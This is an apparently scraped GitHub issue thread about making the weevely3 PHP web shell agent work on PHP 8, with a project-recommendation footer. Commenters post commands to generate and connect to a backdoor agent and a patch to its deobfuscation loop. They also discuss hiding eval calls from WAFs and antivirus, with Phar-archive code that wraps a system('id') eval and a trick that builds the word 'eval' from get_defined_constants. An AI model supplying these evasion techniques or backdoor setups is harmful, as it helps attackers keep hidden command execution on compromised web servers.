Comments (11)
To generate an agent that works with PHP 8+:
Run the generate command with the flag -obfuscator cleartext1_php
to disable the agent obfuscation (this is the only place that create_function
is used).
Change a line in the agent to swap curly braces to square ones:
...
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
}
}
...
from weevely3.
Hello @nickylivardo,
Thank's for you answer ! it succefully works !
Below, it's a step by step tutorial :
weevely generate -obfuscator cleartext1_php 123 file.php
nano file.php
...
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
}
}
...
weevely http://localhost/file.php 123
++
Archidote
from weevely3.
@archidote @nickylivardo, thx for the answer.
For future generations:
This problem still exists in
Weevely: 4.0.1
PHP Version: 8.2.2
System: Kali linux
from weevely3.
The obfpost_php.tpl
template is pretty easy to fix, as shown above.
But I feel like there is no alternative to the now defunct create_function
: the only alternative would be eval
, but the purpose of this obfuscator is to hide the eval
call to an eventual WAF/AV in the first place, so using this function to start the deobfuscation process seems odd, if not useless.
We cannot call it from a string (ie. $f = "ev"."al"; $f("...");
) because eval
is a language construct, not a function.
Does anyone have an idea to save this obfuscator from obsolescence ?
Edit: assert
could have been a good candidate but it does not evaluate string arguments since 8.0.0, so it's not usable.
Edit 2: it may be possible to use a (compressed) Phar archive to mangle the eval
call.
Phar support is enabled by default according to PHP documentation.
It works with allow_url_include = Off
.
<?php
$a = new Phar('x.phar');
$a->startBuffering();
$a->addFromString('index.php', "<?php\neval('system(\"id\");');"); // This gets compressed
$a->setStub('<?php
include "phar://".basename(__FILE__)."/index.php";
__HALT_COMPILER();
');
$a->stopBuffering();
$a->compressFiles(Phar::GZ);
Result
00000000: 3c3f 7068 700a 696e 636c 7564 6520 2270 <?php.include "p
00000010: 6861 723a 2f2f 222e 6261 7365 6e61 6d65 har://".basename
00000020: 285f 5f46 494c 455f 5f29 2e22 2f69 6e64 (__FILE__)."/ind
00000030: 6578 2e70 6870 223b 0a5f 5f48 414c 545f ex.php";.__HALT_
00000040: 434f 4d50 494c 4552 2829 3b20 3f3e 0d0a COMPILER(); ?>..
00000050: 5400 0000 0200 0000 1100 0010 0100 0000 T...............
00000060: 0000 0000 0000 0900 0000 696e 6465 782e ..........index.
00000070: 7068 701c 0000 002e 4a84 641e 0000 0008 php.....J.d.....
00000080: e929 0db4 1100 0000 0000 0001 0000 0078 .).............x
00000090: 1c00 0000 2e4a 8464 1f00 0000 cc69 d406 .....J.d.....i..
000000a0: b411 0000 0000 0000 b3b1 2fc8 2850 482d ........../.(PH-
000000b0: 4bcc d150 2fae 2c2e 49cd d550 ca4c 51d2 K..P/.,.I..P.LQ.
000000c0: b456 d7b4 0600 dbbc 51ff 84c6 032f 5def .V......Q..../].
000000d0: 3317 03f4 d7e9 e879 9ebd 1a70 ca27 f0d2 3......y...p.'..
000000e0: 96b0 eb5b 0072 0202 e90d 9891 bf8f de1a ...[.r..........
000000f0: dbfa 64d0 14a6 fb5d e8eb dd94 c21f 040f ..d....]........
00000100: 4abf 877e 9303 0000 0047 424d 42 J..~.....GBMB
I created a PR to fix the agent and add a phar
obfuscator.
from weevely3.
I got the same problem only with PHP 8th. So I think there may be several measures applied in the newest PHP version.
from weevely3.
I confirm that PHP 8 removed create_function
, breaking the PHP agent.
from weevely3.
Hi there
I try it on last version of kali and php 7.3 but I still have this problem but fortunately the shell completely works fine,problem is that this error is so annoying
Why this happenes exactly ?
is there any quick fix or complete fix for this issue?
from weevely3.
I confirm that PHP 8 removed
create_function
, breaking the PHP agent.
call_user_func still exists and works generally the same as create_function did
on an unrelated note, the function names in the php agent can be generated dynamically while still somewhat obfuscated by building them with static values returned by php functions such as the array keys for get_defined_constants
example with eval
`<?php
// this should return 'eval' on most php versions,
$func = strtolower(array_keys(get_defined_constants())[1]);
print($func[0].$func[6].$func[9].$func[11]);
`
there are enough static values located in the same indexes returned from get_defined_constants across most php versions to extend further with other function names
from weevely3.
The purpose of create_function
was to execute in-memory PHP code from a dynamic string without leaving visible eval()
s in the code. From a quick glance, it does not seem is possible to do the same with call_user_func
.
from weevely3.
I got the same error as you all. :/
from weevely3.
To generate an agent that works with PHP 8+:
Run the generate command with the flag
-obfuscator cleartext1_php
to disable the agent obfuscation (this is the only place thatcreate_function
is used).Change a line in the agent to swap curly braces to square ones:
... for($i=0;$i<$l;){ for($j=0;($j<$c&&$i<$l);$j++,$i++) { - $o.=$t{$i}^$k{$j}; + $o.=$t[$i]^$k[$j]; } } ...
it works, thanks
from weevely3.
Related Issues (20)
- it could not read the local file path HOT 3
- I tried to connect to the database . but I can not
- simple one-word-backdoor program communication failed HOT 1
- Who usage :file_cp
- PHP setup failed, but I sure the environment is ok HOT 1
- The script cannot run correctly in PHP 8th. HOT 1
- File edit functionality not working HOT 1
- [CLOSED] Weevely modules HOT 1
- How to manually install Proxy2 CA HOT 2
- Upgrade PHP code to fit PHP8 HOT 3
- onecmd doesn't work without full session HOT 1
- free(): invalid pointer HOT 1
- Fix `:net_proxy`
- Fix `:file_tar` compatibility with PHP8
- ModuleNotFoundError: No module named 'readline' AND 'gnureadline' HOT 1
- ImportError: cannot import name 'spawn' from 'distutils' (/usr/lib/python3.10/distutils/__init__.py) HOT 1
- bundle a new release, so distributions can update their repositories
- version not updated in 4.0.2 release HOT 1
- python trace if executed without arguements HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from weevely3.